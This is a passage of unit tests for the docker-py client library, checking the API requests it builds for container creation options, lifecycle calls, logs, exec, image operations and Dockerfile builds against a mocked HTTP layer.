"/tmp:/mnt/2",
],
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = [
"/tmp:/mnt/1:ro",
"/tmp:/mnt/2",
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_port_binds(self):
self.maxDiff = None
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
port_bindings = data['HostConfig']['PortBindings']
self.assertTrue('1111/tcp' in port_bindings)
self.assertTrue('2222/tcp' in port_bindings)
self.assertTrue('3333/udp' in port_bindings)
self.assertTrue('4444/tcp' in port_bindings)
self.assertTrue('5555/tcp' in port_bindings)
self.assertTrue('6666/tcp' in port_bindings)
self.assertEqual(
[{"HostPort": "", "HostIp": ""}],
port_bindings['1111/tcp']
)
self.assertEqual(
[{"HostPort": "2222", "HostIp": ""}],
port_bindings['2222/tcp']
)
self.assertEqual(
[{"HostPort": "3333", "HostIp": ""}],
port_bindings['3333/udp']
)
self.assertEqual(
[{"HostPort": "", "HostIp": "127.0.0.1"}],
port_bindings['4444/tcp']
)
self.assertEqual(
[{"HostPort": "5555", "HostIp": "127.0.0.1"}],
port_bindings['5555/tcp']
)
self.assertEqual(len(port_bindings['6666/tcp']), 2)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_mac_address(self):
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
def test_create_container_with_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={link_path: alias}
)
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_multiple_links(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = [
'path1:alias1', 'path2:alias2'
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_links_as_list_of_tuples(self):
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
links=[(link_path, alias)]
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_privileged(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(privileged=True)
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Privileged'] = True
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_with_lxc_conf(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_lxc_conf_compat(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_ro(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {
"bind": '/mnt',
"ro": True
}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_binds_rw(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, binds={
'/tmp': {"bind": '/mnt', "ro": False}
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_port_binds(self):
self.maxDiff = None
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
})
pytest.deprecated_call(call_start)
def test_start_container_with_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID, links={'path': 'alias'}
)
pytest.deprecated_call(call_start)
def test_start_container_with_multiple_links(self):
def call_start():
self.client.start(
fake_api.FAKE_CONTAINER_ID,
links={
'path1': 'alias1',
'path2': 'alias2'
}
)
pytest.deprecated_call(call_start)
def test_start_container_with_links_as_list_of_tuples(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID,
links=[('path', 'alias')])
pytest.deprecated_call(call_start)
def test_start_container_privileged(self):
def call_start():
self.client.start(fake_api.FAKE_CONTAINER_ID, privileged=True)
pytest.deprecated_call(call_start)
def test_start_container_with_dict_instead_of_id(self):
self.client.start({'Id': fake_api.FAKE_CONTAINER_ID})
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_restart_policy(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
restart_policy={
"Name": "always",
"MaximumRetryCount": 0
}
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['RestartPolicy'] = {
"MaximumRetryCount": 0, "Name": "always"
}
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_added_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_add=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapAdd'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_dropped_capabilities(self):
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(cap_drop=['MKNOD'])
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['CapDrop'] = ['MKNOD']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_devices(self):
self.client.create_container(
'busybox', 'true', host_config=self.client.create_host_config(
devices=['/dev/sda:/dev/xvda:rwm',
'/dev/sdb:/dev/xvdb',
'/dev/sdc']
)
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Devices'] = [
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvda',
'PathOnHost': '/dev/sda'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/xvdb',
'PathOnHost': '/dev/sdb'},
{'CgroupPermissions': 'rwm',
'PathInContainer': '/dev/sdc',
'PathOnHost': '/dev/sdc'}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_dict(self):
labels_dict = {
six.text_type('foo'): six.text_type('1'),
six.text_type('bar'): six.text_type('2'),
}
self.client.create_container(
'busybox', 'true',
labels=labels_dict,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_labels_list(self):
labels_list = [
six.text_type('foo'),
six.text_type('bar'),
]
labels_dict = {
six.text_type('foo'): six.text_type(),
six.text_type('bar'): six.text_type(),
}
self.client.create_container(
'busybox', 'true',
labels=labels_list,
)
args = fake_request.call_args
self.assertEqual(args[0][1], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['Labels'], labels_dict)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_named_volume(self):
mount_dest = '/mnt'
volume_name = 'name'
self.client.create_container(
'busybox', 'true',
host_config=self.client.create_host_config(
binds={volume_name: {
"bind": mount_dest,
"ro": False
}}),
volume_driver='foodriver',
)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['VolumeDriver'] = 'foodriver'
expected_payload['HostConfig'] = self.client.create_host_config()
expected_payload['HostConfig']['Binds'] = ["name:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_resize_container(self):
self.client.resize(
{'Id': fake_api.FAKE_CONTAINER_ID},
height=15,
width=120
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/resize',
params={'h': 15, 'w': 120},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_rename_container(self):
self.client.rename(
{'Id': fake_api.FAKE_CONTAINER_ID},
name='foobar'
)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/rename',
params={'name': 'foobar'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_wait(self):
self.client.wait(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def test_wait_with_dict_instead_of_id(self):
self.client.wait({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/wait',
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = docker.Client(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = docker.Client(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = docker.Client(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = docker.Client(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = docker.Client(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_logs(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_logs_with_dict_instead_of_id(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
logs = self.client.logs({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
self.assertEqual(
logs,
'Flowering Nights\n(Sakuya Iyazoi)\n'.encode('ascii')
)
def test_log_streaming(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=True)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_log_tail(self):
with mock.patch('docker.Client.inspect_container',
fake_inspect_container):
self.client.logs(fake_api.FAKE_CONTAINER_ID, stream=False,
tail=10)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 0, 'stderr': 1, 'stdout': 1,
'tail': 10},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=False
)
def test_log_tty(self):
m = mock.Mock()
with mock.patch('docker.Client.inspect_container',
fake_inspect_container_tty):
with mock.patch('docker.Client._stream_raw_result',
m):
self.client.logs(fake_api.FAKE_CONTAINER_ID,
stream=True)
self.assertTrue(m.called)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/logs',
params={'timestamps': 0, 'follow': 1, 'stderr': 1, 'stdout': 1,
'tail': 'all'},
timeout=DEFAULT_TIMEOUT_SECONDS,
stream=True
)
def test_diff(self):
self.client.diff(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_diff_with_dict_instead_of_id(self):
self.client.diff({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/changes',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_port(self):
self.client.port({'Id': fake_api.FAKE_CONTAINER_ID}, 1111)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_stop_container(self):
timeout = 2
self.client.stop(fake_api.FAKE_CONTAINER_ID, timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_stop_container_with_dict_instead_of_id(self):
timeout = 2
self.client.stop({'Id': fake_api.FAKE_CONTAINER_ID},
timeout=timeout)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/stop',
params={'t': timeout},
timeout=(DEFAULT_TIMEOUT_SECONDS + timeout)
)
def test_exec_create(self):
self.client.exec_create(fake_api.FAKE_CONTAINER_ID, ['ls', '-1'])
args = fake_request.call_args
self.assertEqual('POST', args[0][0])
self.assertEqual(
args[0][1], url_prefix + 'containers/{0}/exec'.format(
fake_api.FAKE_CONTAINER_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'AttachStdout': True,
'Container': fake_api.FAKE_CONTAINER_ID,
'Cmd': ['ls', '-1'],
'Privileged': False,
'AttachStdin': False,
'AttachStderr': True,
'User': ''
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_start(self):
self.client.exec_start(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/start'.format(
fake_api.FAKE_EXEC_ID
)
)
self.assertEqual(
json.loads(args[1]['data']), {
'Tty': False,
'Detach': False,
}
)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_exec_inspect(self):
self.client.exec_inspect(fake_api.FAKE_EXEC_ID)
args = fake_request.call_args
self.assertEqual(
args[0][1], url_prefix + 'exec/{0}/json'.format(
fake_api.FAKE_EXEC_ID
)
)
def test_exec_resize(self):
self.client.exec_resize(fake_api.FAKE_EXEC_ID, height=20, width=60)
fake_request.assert_called_with(
'POST',
url_prefix + 'exec/{0}/resize'.format(fake_api.FAKE_EXEC_ID),
params={'h': 20, 'w': 60},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_pause_container(self):
self.client.pause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/pause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_unpause_container(self):
self.client.unpause(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/unpause',
timeout=(DEFAULT_TIMEOUT_SECONDS)
)
def test_kill_container(self):
self.client.kill(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_dict_instead_of_id(self):
self.client.kill({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_kill_container_with_signal(self):
self.client.kill(fake_api.FAKE_CONTAINER_ID, signal=signal.SIGTERM)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/kill',
params={'signal': signal.SIGTERM},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container(self):
self.client.restart(fake_api.FAKE_CONTAINER_ID, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_restart_container_with_dict_instead_of_id(self):
self.client.restart({'Id': fake_api.FAKE_CONTAINER_ID}, timeout=2)
fake_request.assert_called_with(
'POST',
url_prefix + 'containers/3cc2351ab11b/restart',
params={'t': 2},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_container_with_dict_instead_of_id(self):
self.client.remove_container({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': False, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export(self):
self.client.export(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_export_with_dict_instead_of_id(self):
self.client.export({'Id': fake_api.FAKE_CONTAINER_ID})
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/export',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container(self):
self.client.inspect_container(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_container_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_container(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_container_stats(self):
self.client.stats(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/stats',
timeout=60,
stream=True
)
def test_container_top(self):
self.client.top(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_container_top_with_psargs(self):
self.client.top(fake_api.FAKE_CONTAINER_ID, 'waux')
fake_request.assert_called_with(
'GET',
url_prefix + 'containers/3cc2351ab11b/top',
params={'ps_args': 'waux'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
##################
# IMAGES TESTS #
##################
def test_pull(self):
self.client.pull('joffrey/test001')
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertFalse(args[1]['stream'])
def test_pull_stream(self):
self.client.pull('joffrey/test001', stream=True)
args = fake_request.call_args
self.assertEqual(
args[0][1],
url_prefix + 'images/create'
)
self.assertEqual(
args[1]['params'],
{'tag': None, 'fromImage': 'joffrey/test001'}
)
self.assertTrue(args[1]['stream'])
def test_commit(self):
self.client.commit(fake_api.FAKE_CONTAINER_ID)
fake_request.assert_called_with(
'POST',
url_prefix + 'commit',
data='{}',
headers={'Content-Type': 'application/json'},
params={
'repo': None,
'comment': None,
'tag': None,
'container': '3cc2351ab11b',
'author': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_remove_image(self):
self.client.remove_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'images/e9aa60c60128',
params={'force': False, 'noprune': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_history(self):
self.client.history(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/history',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image(self):
self.client.import_image(
fake_api.FAKE_TARBALL_PATH,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': fake_api.FAKE_TARBALL_PATH
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_bytes(self):
stream = (i for i in range(0, 100))
self.client.import_image(
stream,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromSrc': '-',
},
headers={
'Content-Type': 'application/tar',
},
data=stream,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_import_image_from_image(self):
self.client.import_image(
image=fake_api.FAKE_IMAGE_NAME,
repository=fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/create',
params={
'repo': fake_api.FAKE_REPO_NAME,
'tag': fake_api.FAKE_TAG_NAME,
'fromImage': fake_api.FAKE_IMAGE_NAME
},
data=None,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image(self):
self.client.inspect_image(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/test_image/json',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_inspect_image_undefined_id(self):
for arg in None, '', {True: True}:
with pytest.raises(docker.errors.NullResource) as excinfo:
self.client.inspect_image(arg)
self.assertEqual(
excinfo.value.args[0], 'image or container param is undefined'
)
def test_insert_image(self):
try:
self.client.insert(fake_api.FAKE_IMAGE_NAME,
fake_api.FAKE_URL, fake_api.FAKE_PATH)
except docker.errors.DeprecatedMethod:
self.assertTrue(
docker.utils.compare_version('1.12', self.client._version) >= 0
)
return
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/insert',
params={
'url': fake_api.FAKE_URL,
'path': fake_api.FAKE_PATH
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_with_tag(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(
fake_api.FAKE_IMAGE_NAME, tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': fake_api.FAKE_TAG_NAME,
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=False,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_push_image_stream(self):
with mock.patch('docker.auth.auth.resolve_authconfig',
fake_resolve_authconfig):
self.client.push(fake_api.FAKE_IMAGE_NAME, stream=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/test_image/push',
params={
'tag': None
},
data='{}',
headers={'Content-Type': 'application/json'},
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image(self):
self.client.tag(fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_tag(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID,
fake_api.FAKE_REPO_NAME,
tag=fake_api.FAKE_TAG_NAME
)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': 'tag',
'repo': 'repo',
'force': 0
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_tag_image_force(self):
self.client.tag(
fake_api.FAKE_IMAGE_ID, fake_api.FAKE_REPO_NAME, force=True)
fake_request.assert_called_with(
'POST',
url_prefix + 'images/e9aa60c60128/tag',
params={
'tag': None,
'repo': 'repo',
'force': 1
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_get_image(self):
self.client.get_image(fake_api.FAKE_IMAGE_ID)
fake_request.assert_called_with(
'GET',
url_prefix + 'images/e9aa60c60128/get',
stream=True,
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_load_image(self):
self.client.load_image('Byte Stream....')
fake_request.assert_called_with(
'POST',
url_prefix + 'images/load',
data='Byte Stream....',
timeout=DEFAULT_TIMEOUT_SECONDS
)
#################
# BUILDER TESTS #
#################
def test_build_container(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script)
def test_build_container_pull(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, pull=True)
def test_build_container_stream(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
self.client.build(fileobj=script, stream=True)
def test_build_container_custom_context(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
context = docker.utils.mkbuildcontext(script)
self.client.build(fileobj=context, custom_context=True)
def test_build_container_custom_context_gzip(self):
script = io.BytesIO('\n'.join([
'FROM busybox',
'MAINTAINER docker-py',
'RUN mkdir -p /tmp/test',
'EXPOSE 8080',
'ADD https://dl.dropboxusercontent.com/u/20637798/silence.tar.gz'
' /tmp/silence.tar.gz'
]).encode('ascii'))
